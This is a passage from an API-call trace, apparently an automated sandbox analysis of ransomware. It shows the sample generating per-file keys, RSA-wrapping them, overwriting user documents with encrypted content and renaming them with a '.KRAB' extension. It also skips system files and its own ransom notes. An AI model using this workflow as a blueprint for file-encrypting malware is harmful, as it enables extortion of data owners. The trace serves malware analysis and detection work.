GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.185] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.185] CryptGenRandom (in: hProv=0x1010b50, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0087.185] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0087.185] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.185] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010ce8) returned 1 [0087.187] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.187] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.188] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.188] CryptGenRandom (in: hProv=0x1010ce8, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0087.188] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0087.188] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.188] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010e80) returned 1 [0087.197] CryptImportKey (in: hProv=0x1010e80, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x10230f8) returned 1 [0087.197] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0087.197] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0087.197] GetLastError () returned 0x0 [0087.197] CryptDestroyKey (hKey=0x10230f8) returned 1 [0087.197] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0087.197] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010820) returned 1 [0087.253] CryptImportKey (in: hProv=0x1010820, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x1023278) returned 1 [0087.254] CryptGetKeyParam (in: hKey=0x1023278, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0087.254] CryptEncrypt (in: hKey=0x1023278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0087.254] GetLastError () returned 0x0 [0087.254] CryptDestroyKey (hKey=0x1023278) returned 1 [0087.254] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0087.254] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\7jqj01n.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\7jqj01n.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0087.255] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0087.255] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0087.255] ReadFile (in: hFile=0x474, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x17dd6, lpOverlapped=0x0) returned 1 [0087.357] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe822a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.357] WriteFile (in: hFile=0x474, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x17dd6, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x17dd6, lpOverlapped=0x0) returned 1 [0087.357] WriteFile (in: hFile=0x474, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0087.357] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.373] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.374] CloseHandle (hObject=0x474) returned 1 [0087.374] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.375] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\7jqj01n.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\7jqj01n.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\7jqj01n.xlsx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\7jqj01n.xlsx.krab")) returned 1 [0087.375] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.376] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0087.376] lstrcmpW (lpString1="BSdUlLP_fPL9cx.docx", lpString2=".") returned 1 [0087.376] lstrcmpW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="..") returned 1 [0087.376] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\", lpString2="BSdUlLP_fPL9cx.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\BSdUlLP_fPL9cx.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\BSdUlLP_fPL9cx.docx" [0087.376] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0087.376] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\BSdUlLP_fPL9cx.docx.KRAB") returned 67 [0087.385] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\BSdUlLP_fPL9cx.docx") returned 62 [0087.385] lstrlenW (lpString=".docx") returned 5 [0087.385] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.385] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0087.385] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.386] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\BSdUlLP_fPL9cx.docx") returned 62 [0087.386] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\BSdUlLP_fPL9cx.docx") returned 62 [0087.386] lstrcmpiW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="desktop.ini") returned -1 [0087.386] lstrcmpiW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="autorun.inf") returned 1 [0087.386] lstrcmpiW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="ntuser.dat") returned -1 [0087.386] lstrcmpiW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="iconcache.db") returned -1 [0087.386] lstrcmpiW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="bootsect.bak") returned 1 [0087.386] lstrcmpiW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="boot.ini") returned 1 [0087.386] lstrcmpiW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="ntuser.dat.log") returned -1 [0087.386] lstrcmpiW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="thumbs.db") returned -1 [0087.386] lstrcmpiW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="KRAB-DECRYPT.html") returned -1 [0087.386] lstrcmpiW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="KRAB-DECRYPT.txt") returned -1 [0087.386] lstrcmpiW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="CRAB-DECRYPT.txt") returned -1 [0087.386] lstrcmpiW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="ntldr") returned -1 [0087.386] lstrcmpiW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="NTDETECT.COM") returned -1 [0087.386] lstrcmpiW (lpString1="BSdUlLP_fPL9cx.docx", lpString2="Bootfont.bin") returned 1 [0087.386] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.387] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011238) returned 1 [0087.393] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.438] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.438] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.438] CryptGenRandom (in: hProv=0x1011238, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0087.438] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0087.438] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.439] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10108a8) returned 1 [0087.440] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.440] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.441] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.441] CryptGenRandom (in: hProv=0x10108a8, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0087.441] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0087.441] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.441] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010bd8) returned 1 [0087.443] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x1023038) returned 1 [0087.443] CryptGetKeyParam (in: hKey=0x1023038, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0087.443] CryptEncrypt (in: hKey=0x1023038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0087.443] GetLastError () returned 0x0 [0087.443] CryptDestroyKey (hKey=0x1023038) returned 1 [0087.443] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0087.443] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010ce8) returned 1 [0087.445] CryptImportKey (in: hProv=0x1010ce8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x10235f8) returned 1 [0087.445] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0087.445] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0087.445] GetLastError () returned 0x0 [0087.445] CryptDestroyKey (hKey=0x10235f8) returned 1 [0087.445] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0087.445] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\BSdUlLP_fPL9cx.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\bsdullp_fpl9cx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0087.446] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0087.446] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0087.446] ReadFile (in: hFile=0x474, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0xf3e5, lpOverlapped=0x0) returned 1 [0087.460] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff0c1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.460] WriteFile (in: hFile=0x474, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xf3e5, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0xf3e5, lpOverlapped=0x0) returned 1 [0087.460] WriteFile (in: hFile=0x474, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0087.460] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.464] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.465] CloseHandle (hObject=0x474) returned 1 [0087.465] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.465] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\BSdUlLP_fPL9cx.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\bsdullp_fpl9cx.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\BSdUlLP_fPL9cx.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\bsdullp_fpl9cx.docx.krab")) returned 1 [0087.466] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.466] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0087.466] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0087.466] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0087.466] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\d2ca4a08d2ca4dee3d.lock" [0087.466] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0087.467] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 71 [0087.467] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\d2ca4a08d2ca4dee3d.lock") returned 66 [0087.467] lstrlenW (lpString=".lock") returned 5 [0087.467] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.467] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0087.467] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.468] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.468] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0087.468] lstrcmpW (lpString1="F hQgcCj 9.pdf", lpString2=".") returned 1 [0087.468] lstrcmpW (lpString1="F hQgcCj 9.pdf", lpString2="..") returned 1 [0087.468] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\", lpString2="F hQgcCj 9.pdf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\F hQgcCj 9.pdf") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\F hQgcCj 9.pdf" [0087.468] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0087.468] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\F hQgcCj 9.pdf.KRAB") returned 62 [0087.469] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\F hQgcCj 9.pdf") returned 57 [0087.469] lstrlenW (lpString=".pdf") returned 4 [0087.469] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.469] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".pdf ") returned 5 [0087.469] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.469] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\F hQgcCj 9.pdf") returned 57 [0087.469] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\F hQgcCj 9.pdf") returned 57 [0087.469] lstrcmpiW (lpString1="F hQgcCj 9.pdf", lpString2="desktop.ini") returned 1 [0087.469] lstrcmpiW (lpString1="F hQgcCj 9.pdf", lpString2="autorun.inf") returned 1 [0087.469] lstrcmpiW (lpString1="F hQgcCj 9.pdf", lpString2="ntuser.dat") returned -1 [0087.469] lstrcmpiW (lpString1="F hQgcCj 9.pdf", lpString2="iconcache.db") returned -1 [0087.470] lstrcmpiW (lpString1="F hQgcCj 9.pdf", lpString2="bootsect.bak") returned 1 [0087.470] lstrcmpiW (lpString1="F hQgcCj 9.pdf", lpString2="boot.ini") returned 1 [0087.470] lstrcmpiW (lpString1="F hQgcCj 9.pdf", lpString2="ntuser.dat.log") returned -1 [0087.470] lstrcmpiW (lpString1="F hQgcCj 9.pdf", lpString2="thumbs.db") returned -1 [0087.470] lstrcmpiW (lpString1="F hQgcCj 9.pdf", lpString2="KRAB-DECRYPT.html") returned -1 [0087.470] lstrcmpiW (lpString1="F hQgcCj 9.pdf", lpString2="KRAB-DECRYPT.txt") returned -1 [0087.470] lstrcmpiW (lpString1="F hQgcCj 9.pdf", lpString2="CRAB-DECRYPT.txt") returned 1 [0087.470] lstrcmpiW (lpString1="F hQgcCj 9.pdf", lpString2="ntldr") returned -1 [0087.470] lstrcmpiW (lpString1="F hQgcCj 9.pdf", lpString2="NTDETECT.COM") returned -1 [0087.470] lstrcmpiW (lpString1="F hQgcCj 9.pdf", lpString2="Bootfont.bin") returned 1 [0087.470] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.470] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010f90) returned 1 [0087.472] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.472] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.472] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.472] CryptGenRandom (in: hProv=0x1010f90, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0087.472] CryptReleaseContext (hProv=0x1010f90, dwFlags=0x0) returned 1 [0087.473] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.473] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10108a8) returned 1 [0087.474] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.475] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.475] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.475] CryptGenRandom (in: hProv=0x10108a8, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0087.475] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0087.475] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.475] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010e80) returned 1 [0087.477] CryptImportKey (in: hProv=0x1010e80, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x1023038) returned 1 [0087.477] CryptGetKeyParam (in: hKey=0x1023038, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0087.477] CryptEncrypt (in: hKey=0x1023038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0087.477] GetLastError () returned 0x0 [0087.477] CryptDestroyKey (hKey=0x1023038) returned 1 [0087.477] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0087.477] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011700) returned 1 [0087.479] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x1023038) returned 1 [0087.479] CryptGetKeyParam (in: hKey=0x1023038, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0087.479] CryptEncrypt (in: hKey=0x1023038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0087.479] GetLastError () returned 0x0 [0087.479] CryptDestroyKey (hKey=0x1023038) returned 1 [0087.479] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0087.480] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\F hQgcCj 9.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\f hqgccj 9.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0087.480] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0087.480] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0087.481] ReadFile (in: hFile=0x474, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0xcf58, lpOverlapped=0x0) returned 1 [0087.574] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff30a8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.575] WriteFile (in: hFile=0x474, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xcf58, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0xcf58, lpOverlapped=0x0) returned 1 [0087.575] WriteFile (in: hFile=0x474, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0087.575] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.583] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.583] CloseHandle (hObject=0x474) returned 1 [0087.584] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.584] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\F hQgcCj 9.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\f hqgccj 9.pdf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\F hQgcCj 9.pdf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\f hqgccj 9.pdf.krab")) returned 1 [0087.585] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.585] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0087.585] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0087.585] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0087.585] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\", lpString2="KRAB-DECRYPT.txt" | out: 